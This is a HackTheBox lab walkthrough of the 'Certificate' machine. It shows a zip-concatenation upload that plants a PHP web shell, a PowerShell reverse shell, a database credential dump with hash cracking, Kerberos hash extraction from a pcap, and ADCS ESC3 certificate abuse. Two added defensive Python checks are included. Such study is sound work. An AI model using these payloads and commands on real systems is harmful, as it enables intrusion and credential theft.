CERTIFICATE - HTB Notes

CERTIFICATE

Here are my notes on CERTIFICATE from HackTheBox.

CERTIFICATE: 10.129.200.104

PORT     STATE SERVICE           VERSION                                                                                                            
53/tcp   open  domain            Simple DNS Plus
80/tcp   open  http              Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
|_http-title: Did not follow redirect to http://certificate.htb/

sudo nikto -C all -h=http://certificate.htb/ -o nikto.txt

Nothing interesting there.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://certificate.htb/FUZZ

#Nothing interesting, so maybe try dirsearch instead.

dirsearch -u http://certificate.htb/

#Nothing interesting.

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://certificate.htb/ -H "Host: FUZZ.certificate.htb"

#NO VHOST


Register an account as usual. 

"Please note that after creating a teacher account you need to contact our support to verify your identity and activate your account"

I created an account (qwop) as a teacher; after logging in it leads to a completely blank page.

Teacher account = DISABLED, need to contact support.

Student account = works just fine.

Contact page: 

support@certificate.htb
Send us your query anytime!


#No hidden links or anything like that where we could capture a request for XSS attacks.

#MOVE ON.

Let's go back to the student account and enroll in some courses.

Go to any of the assignment, submit, quiz and exam sections.

They allow uploading a file.

http://certificate.htb/upload.php?s_id=8

Please select the assignment file you want to upload (the file will be reviewed by the course instructor)
We accept only the following file types: .pdf .docx .pptx .xlsx
You include the assignment file in a .zip archive to reduce its size

Let's see if we can steal an NTLM hash out of it.

I guess not.

But can we upload a PHP file, though?

400 bad request.

The request you sent contains bad or malicious content(Invalid MIME type).

File Upload Bypass?

Change MIME type = application/pdf 

shell.pdf.php 

400 Bad Request
The request you sent contains bad or malicious content(Invalid Extension).

The file upload bypass didn't work, but we can try Zip Slip instead.

ZIP SLIP File Upload Exploitation NOTES: 

This vulnerability involves uploading a malicious ZIP archive containing path traversal sequences (like ../../) to overwrite sensitive files on the server during extraction.

https://medium.com/@ibm_ptc_security/zip-slip-attack-e3e63a13413f

Preparing the Malicious ZIP:

1. Create a benign zip with a regular PDF file:

zip benign.zip legit.pdf

2. Create a reverse shell payload:

mkdir malicious_files
cd malicious_files
nano shell.php
<?php $out=shell_exec($_REQUEST['cmd']); echo "<pre>$out</pre>"; ?>

3. Package the malicious payload:

zip -r malicious.zip malicious_files/

4. Combine both ZIPs into a single archive:

cat benign.zip malicious.zip > combined.zip

This combined.zip contains both a harmless PDF and the malicious PHP web shell. The idea is to trick the server into extracting the payload and placing it in a web-accessible location.
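
As an added example (not from the original notes or from the box's web app), here is the server-side validation that would have blocked this upload: it rejects archives with more than one end-of-central-directory record (the `cat benign.zip malicious.zip` trick), entries whose path climbs out of the extraction directory (Zip Slip), and entries with extensions outside the site's own allowed list. The upload directory `/var/www/uploads/job` and the sample archives are constructed assumptions.

```python
import io
import os
import posixpath
import zipfile

# Allowed document types, taken from the upload page's own rule.
ALLOWED_EXT = {".pdf", ".docx", ".pptx", ".xlsx"}
EOCD_SIG = b"PK\x05\x06"  # end-of-central-directory record signature


def member_is_contained(name: str, dest: str) -> bool:
    """True if a zip entry name resolves to a path strictly inside dest.

    Rejects absolute paths, drive letters and any '..' that climbs above
    dest, regardless of which separator the archive used.
    """
    if not name or name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":"):
        return False
    norm = posixpath.normpath(name.replace("\\", "/"))
    if norm == ".." or norm.startswith("../"):
        return False
    root = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(root, norm))
    return target.startswith(root + os.sep)


def eocd_count(data: bytes) -> int:
    """Count end-of-central-directory records.

    A well-formed archive has exactly one. Two archives glued together with
    `cat a.zip b.zip` carry two, and different zip libraries then disagree on
    which entry list is 'the' archive (one sees legit.pdf, another shell.php).
    A signature inside stored file data would also be counted, which is
    acceptable here: reject and ask for a clean upload.
    """
    return data.count(EOCD_SIG)


def validate_archive(data: bytes, dest: str = "/var/www/uploads/job") -> list:
    """Return a list of rejection reasons; an empty list means accept."""
    problems = []
    if eocd_count(data) != 1:
        problems.append("ambiguous archive: expected exactly one end-of-central-directory record")
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile as exc:
        problems.append(f"not a valid zip: {exc}")
        return problems
    with zf:
        # infolist() reads the central directory the extractor will use,
        # so every entry that would be written is checked before extraction.
        for info in zf.infolist():
            name = info.filename
            if not member_is_contained(name, dest):
                problems.append(f"path escapes upload directory: {name}")
                continue
            if info.is_dir():
                continue
            ext = posixpath.splitext(name)[1].lower()
            if ext not in ALLOWED_EXT:
                problems.append(f"disallowed file type inside archive: {name}")
    return problems


def build_zip(entries: dict) -> bytes:
    """Build an in-memory zip from {name: bytes} (fixture helper, stored, not deflated)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample archives mirroring the cases from the notes (contents are placeholders).
BENIGN_ZIP = build_zip({"legit.pdf": b"%PDF-1.4 constructed placeholder"})
MALICIOUS_ZIP = build_zip({"malicious_files/shell.php": b"<?php /* constructed placeholder */ ?>"})
COMBINED_ZIP = BENIGN_ZIP + MALICIOUS_ZIP  # same as: cat benign.zip malicious.zip > combined.zip
TRAVERSAL_ZIP = build_zip({"../../htdocs/report.pdf": b"%PDF-1.4 constructed placeholder"})

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN_ZIP), ("combined", COMBINED_ZIP),
                        ("traversal", TRAVERSAL_ZIP)]:
        print(label, "->", validate_archive(blob) or "accepted")
```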

Exploiting the Upload Function:

Upload combined.zip at:

http://certificate.htb/upload.php?s_id=36

After uploading, you’ll see a "CLICK HERE" link. Click it to navigate to the extracted file path.

Now, manually change the URL's end segment to shell.php, like this:

http://certificate.htb/extracted-path/yourfoldername/shell.php

Once accessed, this triggers the web shell. 

It seems the web shell didn't run very well, so I decided to verify.

http://certificate.htb/static/uploads/2ab9246c52ae5cd50a88a4d867008fbf/malicious_files/test.txt

Hello World

#It seems I can upload any file I want here.

Looks like the PHP web shell doesn't work very well?

Maybe try the Windows version of it?

<?php $out=shell_exec($_REQUEST['cmd']); echo "<pre>$out</pre>"; ?>

#WORKS ! 

http://certificate.htb/static/uploads/2ab9246c52ae5cd50a88a4d867008fbf/malicious_files/shell.php?cmd=whoami

http://certificate.htb/static/uploads/2ab9246c52ae5cd50a88a4d867008fbf/malicious_files/shell.php?cmd=dir

We're going to do the same with netcat this time.

┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# zip -r malicious.zip malicious_files/

  adding: malicious_files/ (stored 0%)
  adding: malicious_files/shell.php (deflated 4%)
  adding: malicious_files/ncat.exe (deflated 59%)

┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# cat benign.zip malicious.zip > combined.zip

Never mind, no netcat then lol!

revshells.com as usual. 

revshells payload

powershell -e [BASE64 Payload]

http://certificate.htb/static/uploads/2ab9246c52ae5cd50a88a4d867008fbf/malicious_files/shell.php?cmd=powershell -e [BASE64 Payload]

sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.135] from (UNKNOWN) [10.129.200.104] 58497
whoami
certificate\xamppuser
PS C:\xampp\htdocs\certificate.htb\static\uploads\2ab9246c52ae5cd50a88a4d867008fbf\malicious_files>


REVERSE-SHELL ! 

PRIV ESC: 

xamppuser -> Sara.B

PS C:\xampp\htdocs\certificate.htb> dir


    Directory: C:\xampp\htdocs\certificate.htb


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/26/2024   1:49 AM                static
-a----       12/24/2024  12:45 AM           7179 about.php
-a----       12/30/2024   1:50 PM          17197 blog.php
-a----       12/30/2024   2:02 PM           6560 contacts.php
-a----       12/24/2024   6:10 AM          15381 course-details.php
-a----       12/24/2024  12:53 AM           4632 courses.php
-a----       12/23/2024   4:46 AM            549 db.php
-a----       12/22/2024  10:07 AM           1647 feature-area-2.php
-a----       12/22/2024  10:22 AM           1331 feature-area.php
-a----       12/22/2024  10:16 AM           2955 footer.php
-a----       12/23/2024   5:13 AM           2351 header.php
-a----       12/24/2024  12:52 AM           9497 index.php
-a----       12/25/2024   1:34 PM           5908 login.php
-a----       12/23/2024   5:14 AM            153 logout.php
-a----       12/24/2024   1:27 AM           5321 popular-courses-area.php
-a----       12/25/2024   1:27 PM           8240 register.php
-a----       12/28/2024  11:26 PM          10366 upload.php

PS C:\xampp\htdocs\certificate.htb> type db.php
<?php
// Database connection using PDO
try {
    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
    $db_user = 'certificate_webapp_user'; // Change to your DB username
    $db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
    $options = [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ];
    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
    die('Database connection failed: ' . $e->getMessage());
}
?>

C:\\xampp\\mysql\\bin\\mysqldump.exe -u certificate_webapp_user -pcert!f!c@teDBPWD Certificate_WEBAPP_DB > C:\\xampp\\htdocs\\certificate.htb\\static\\full_dump.sql

Download it in Kali:

wget http://certificate.htb/static/full_dump.sql -O full_dump.sql
--2025-08-27 12:47:47--  http://certificate.htb/static/full_dump.sql
Resolving certificate.htb (certificate.htb)... 10.129.200.104
Connecting to certificate.htb (certificate.htb)|10.129.200.104|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39366 (38K) [application/x-sql]
Saving to: ‘full_dump.sql’

full_dump.sql                          100%[===========================================================================>]  38.44K  --.-KB/s    in 0.04s

2025-08-27 12:47:47 (1.03 MB/s) - ‘full_dump.sql’ saved [39366/39366]

cat full_dump.sql

[SNIP]

INSERT INTO `users` VALUES (1,'Lorra','Armessa','Lorra.AAA','lorra.aaa@certificate.htb','$2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG','2024-12-23 20:43:10','teacher',1),(6,'Sara','Laracrof','Sara1200','sara1200@gmail.com','$2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK','2024-12-23 20:47:11','teacher',1),(7,'John','Wood','Johney','johny009@mail.com','$2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq','2024-12-23 21:18:18','student',1),(8,'Havok','Watterson','havokww','havokww@hotmail.com','$2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti','2024-12-24 17:08:04','teacher',1),(9,'Steven','Roman','stev','steven@yahoo.com','$2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2','2024-12-24 20:05:05','student',1),(10,'Sara','Brawn','sara.b','sara.b@certificate.htb','$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6','2024-12-26 05:31:26','admin',1),(12,'qwop','qwop','qwop','qwop@qwop.com','$2y$04$n552Je6YNEVQ4eWA512RHu3K09iWHcpJJ8seIQPGTNfYo2rMrHfPy','2025-08-27 23:03:50','teacher',0),(14,'qwop2','qwop2','qwop2','qwop2@qwop.com','$2y$04$k3MvRxHzmNxZkZUeyHUBH.KRayCAryEZwm4nMX1QyUdTrfFbvCIUa','2025-08-27 23:11:08','student',1),(15,'qwop3','qwop3','qwop3','qwop3@qwop.com','$2y$04$LOu1JeL61ZiNvJIzz8W0feuT1rEWYThcmWwujOVpGInCfNm2leqa2','2025-08-27 23:15:16','teacher',0);

lorra.aaa:$2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG
sara1200:$2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK
johny009:$2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq
havokww:$2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti
steven:$2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2
sara.b:$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6

┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Blink182         (sara.b)
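
John's "Cost 1 (iteration count) is 16" line is why this cracked so quickly: every hash in the dump uses bcrypt cost 4, i.e. 2^4 = 16 rounds. As an added example, not part of the original notes, this checker parses `user:hash` lines in the same layout as hash.txt and flags any cost below a minimum; the sample lines and the cost-10 policy are constructed assumptions.

```python
import re

# bcrypt modular-crypt format: $2a$ / $2b$ / $2y$, two-digit cost,
# 22-character salt and 31-character hash, both in bcrypt's base64 alphabet.
BCRYPT_RE = re.compile(
    r"^\$(?P<ver>2[aby])\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<hash>[./A-Za-z0-9]{31})$"
)

# Policy assumption for this example: cost 10 is the usual library default;
# anything lower is accepted by bcrypt (minimum 4) but is cheap to brute-force.
MIN_COST = 10


def parse_bcrypt(value: str) -> dict:
    """Parse a bcrypt string into its parts; raise ValueError if malformed."""
    m = BCRYPT_RE.match(value.strip())
    if not m:
        raise ValueError(f"not a bcrypt hash: {value!r}")
    cost = int(m.group("cost"))
    if not 4 <= cost <= 31:
        raise ValueError(f"cost {cost} is outside bcrypt's valid range 4..31")
    return {"version": m.group("ver"), "cost": cost,
            "iterations": 2 ** cost, "salt": m.group("salt")}


def audit_hash_file(text: str, min_cost: int = MIN_COST) -> list:
    """Audit 'user:hash' lines and return (user, cost, iterations, verdict) per line.

    Blank lines and '#' comments are skipped; a value that is not bcrypt
    (e.g. an unsalted MD5) is reported as invalid rather than silently ignored.
    """
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, value = line.partition(":")
        try:
            info = parse_bcrypt(value)
        except ValueError as exc:
            findings.append((user, None, None, f"invalid: {exc}"))
            continue
        if info["cost"] < min_cost:
            # Each cost step below the minimum halves the attacker's work per guess.
            gap = min_cost - info["cost"]
            verdict = f"weak: cost {info['cost']} is 2^{gap}x cheaper than cost {min_cost}"
        else:
            verdict = "ok"
        findings.append((user, info["cost"], info["iterations"], verdict))
    return findings


# Constructed sample in the same layout as hash.txt; these hashes are not from the box.
SAMPLE_HASHES = """\
# user:bcrypt
alice:$2y$04$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ01234
bob:$2b$12$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ01234
carol:5f4dcc3b5aa765d61d8327deb882cf99
"""

if __name__ == "__main__":
    for user, cost, iters, verdict in audit_hash_file(SAMPLE_HASHES):
        print(f"{user:8} cost={cost} rounds={iters} {verdict}")
```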

┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# crackmapexec smb 10.129.200.104 -u sara.b -p Blink182
SMB         10.129.200.104  445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB         10.129.200.104  445    DC01             [+] certificate.htb\sara.b:Blink182

┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# crackmapexec winrm 10.129.200.104 -u sara.b -p Blink182
SMB         10.129.200.104  5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:certificate.htb)
HTTP        10.129.200.104  5985   DC01             [*] http://10.129.200.104:5985/wsman
WINRM       10.129.200.104  5985   DC01             [+] certificate.htb\sara.b:Blink182 (Pwn3d!)

Sara.B -> Lion.SK:

evil-winrm -i 10.129.200.104 -u sara.b -p Blink182

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Sara.B\Documents> whoami
certificate\sara.b
*Evil-WinRM* PS C:\Users\Sara.B\Documents> hostname
DC01

*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> dir


    Directory: C:\Users\Sara.B\Documents\WS-01


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/4/2024  12:44 AM            530 Description.txt
-a----        11/4/2024  12:45 AM         296660 WS-01_PktMon.pcap


*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> type Description.txt
The workstation 01 is not able to open the "Reports" smb shared folder which is hosted on DC01.
When a user tries to input bad credentials, it returns bad credentials error.
But when a user provides valid credentials the file explorer freezes and then crashes!
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> download WS-01_PktMon.pcap

Info: Downloading C:\Users\Sara.B\Documents\WS-01\WS-01_PktMon.pcap to WS-01_PktMon.pcap

Info: Download successful!

Extracting Kerberos Credentials from PCAP: 

WS-01_PktMon.pcap contains Kerberos AS-REQ pre-authentication data that we can extract and crack offline.

https://www.netresec.com/?page=Blog&month=2019-11&post=Extracting-Kerberos-Credentials-from-PCAP

https://notes.benheater.com/books/active-directory/page/extracting-secrets-from-pcaps

https://securityboulevard.com/2019/11/extracting-kerberos-credentials-from-pcap/

https://github.com/jalvarezz13/Krb5RoastParser

https://phyothuraoo.substack.com/p/easy-guide-to-as-rep-roasting-and


┌──(root㉿kali)-[/home/kali/Kali-Tools/Krb5RoastParser]
└─# ls
krb5_roast_parser.py  LICENSE  README.md  WS-01_PktMon.pcap

┌──(root㉿kali)-[/home/kali/Kali-Tools/Krb5RoastParser]
└─# python3 krb5_roast_parser.py WS-01_PktMon.pcap as_req >>hash.txt

┌──(root㉿kali)-[/home/kali/Kali-Tools/Krb5RoastParser]
└─# cat hash.txt
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt

$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0:!QAZ2wsx


Lion.SK:!QAZ2wsx

┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# crackmapexec winrm 10.129.200.104 -u Lion.SK -p '!QAZ2wsx'
SMB         10.129.200.104  5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:certificate.htb)
HTTP        10.129.200.104  5985   DC01             [*] http://10.129.200.104:5985/wsman
WINRM       10.129.200.104  5985   DC01             [+] certificate.htb\Lion.SK:!QAZ2wsx (Pwn3d!)

Lion.SK SHELL ! 


88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-08-27 02:41:53Z)

bloodhound-python -c all --disable-pooling -w 1 -u sara.b -p 'Blink182' -d certificate.htb -dc dc01.certificate.htb -ns 10.129.200.104 --dns-tcp --zip --dns-timeout 120



135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-27T02:42:55+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54

ldapsearch -x -H ldap://10.129.200.104 -D '' -w '' -b "DC=certificate,DC=htb"

LDAPv3: anonymous bind is not allowed, we need an account.


445/tcp  open  microsoft-ds?

smbclient -N -L 10.129.200.104
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.200.104 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available




464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
|_ssl-date: 2025-08-27T02:42:55+00:00; +8h00m00s from scanner time.
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
|_ssl-date: 2025-08-27T02:42:55+00:00; +8h00m00s from scanner time.
3269/tcp open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
|_ssl-date: 2025-08-27T02:42:55+00:00; +8h00m00s from scanner time.
5985/tcp  open  wsman

evil-winrm -i 10.129.200.104 -u Lion.SK -p '!QAZ2wsx'

*Evil-WinRM* PS C:\Users\Lion.SK\Desktop> whoami
certificate\lion.sk
*Evil-WinRM* PS C:\Users\Lion.SK\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\Lion.SK\Desktop> dir


    Directory: C:\Users\Lion.SK\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/26/2025   7:38 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Lion.SK\Desktop> type user.txt
[REDIRECTED]

USER.TXT: [REDIRECTED]

PRIV ESC: 

Lion.SK -> Ryan.K

certipy find -vulnerable -stdout -u Lion.SK@certificate.htb -p '!QAZ2wsx' -dc-ip 10.129.200.104

[*] Trying to get CA configuration for 'Certificate-LTD-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'Certificate-LTD-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : Certificate-LTD-CA
    DNS Name                            : DC01.certificate.htb
    Certificate Subject                 : CN=Certificate-LTD-CA, DC=certificate, DC=htb
    Certificate Serial Number           : 75B2F4BBF31F108945147B466131BDCA
    Certificate Validity Start          : 2024-11-03 22:55:09+00:00
    Certificate Validity End            : 2034-11-03 23:05:09+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CERTIFICATE.HTB\Administrators
      Access Rights
        ManageCertificates              : CERTIFICATE.HTB\Administrators
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        ManageCa                        : CERTIFICATE.HTB\Administrators
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Enroll                          : CERTIFICATE.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : Delegated-CRA
    Display Name                        : Delegated-CRA
    Certificate Authorities             : Certificate-LTD-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False


   [!] Vulnerabilities
      ESC3                              : 'CERTIFICATE.HTB\\Domain CRA Managers' can enroll and template has Certificate Request Agent EKU set


certipy req \
    -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' \
    -dc-ip '10.129.200.104' -target 'DC01.certificate.htb' \
    -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'

┌──(certipy-venv)─(root㉿kali)-[/home/…/BOXES/CERTIFICATE/10.129.200.104/BLOOD]
└─# certipy req \
    -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' \
    -dc-ip '10.129.200.104' -target 'DC01.certificate.htb' \
    -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 22
[*] Got certificate with UPN 'Lion.SK@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1115'
[*] Saved certificate and private key to 'lion.sk.pfx'

certipy req \
    -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' \
    -dc-ip '10.129.200.104' -target 'DC01.certificate.htb' \
    -ca 'Certificate-LTD-CA' -template 'SignedUser' \
    -pfx 'lion.sk.pfx' -on-behalf-of 'certificate\ryan.k'

┌──(certipy-venv)─(root㉿kali)-[/home/…/BOXES/CERTIFICATE/10.129.200.104/BLOOD]
└─# certipy req \
    -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' \
    -dc-ip '10.129.200.104' -target 'DC01.certificate.htb' \
    -ca 'Certificate-LTD-CA' -template 'SignedUser' \
    -pfx 'lion.sk.pfx' -on-behalf-of 'certificate\ryan.k'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 28
[*] Got certificate with UPN 'ryan.k@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Saved certificate and private key to 'ryan.k.pfx'


certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.129.200.104'

┌──(certipy-venv)─(root㉿kali)-[/home/…/BOXES/CERTIFICATE/10.129.200.104/BLOOD]
└─# faketime -f $(ntpdate -q certificate.htb | awk '{print $4}') bash

┌──(certipy-venv)(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104/BLOOD]
└─# certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.129.200.104'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: ryan.k@certificate.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ryan.k.ccache'
[*] Trying to retrieve NT hash for 'ryan.k'
[*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6

┌──(certipy-venv)─(root㉿kali)-[/home/…/BOXES/CERTIFICATE/10.129.200.104/BLOOD]
└─# crackmapexec winrm 10.129.200.104 -u ryan.k -H 'b1bc3d70e70f4f36b1509a65ae1a2ae6'
SMB         10.129.200.104  5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:certificate.htb)
HTTP        10.129.200.104  5985   DC01             [*] http://10.129.200.104:5985/wsman
WINRM       10.129.200.104  5985   DC01             [+] certificate.htb\ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 (Pwn3d!)

┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# evil-winrm -i 10.129.200.104 -u Ryan.K -H 'b1bc3d70e70f4f36b1509a65ae1a2ae6'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami
certificate\ryan.k
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> hostname
DC01

https://hackfa.st/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeManageVolumePrivilege/

SeManageVolumeExploit + ADCS NOTES:

Ryan.K -> Administrator: 

*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami
certificate\ryan.k
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State
============================= ================================ =======
SeMachineAccountPrivilege     Add workstations to domain       Enabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Enabled



#It kinda works, and we can access any directory we want, including the Administrator folder.

#With this advantage we can enumerate and export the CA's private key file.

 
*Evil-WinRM* PS C:\Users\Ryan.K> certutil -Store My
My "Personal"
================ Certificate 0 ================
Archived!
Serial Number: 472cb6148184a9894f6d4d2587b1b165
Issuer: CN=certificate-DC01-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:30 PM
 NotAfter: 11/3/2029 3:40 PM
Subject: CN=certificate-DC01-CA, DC=certificate, DC=htb
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 82ad1e0c20a332c8d6adac3e5ea243204b85d3a7
  Key Container = certificate-DC01-CA
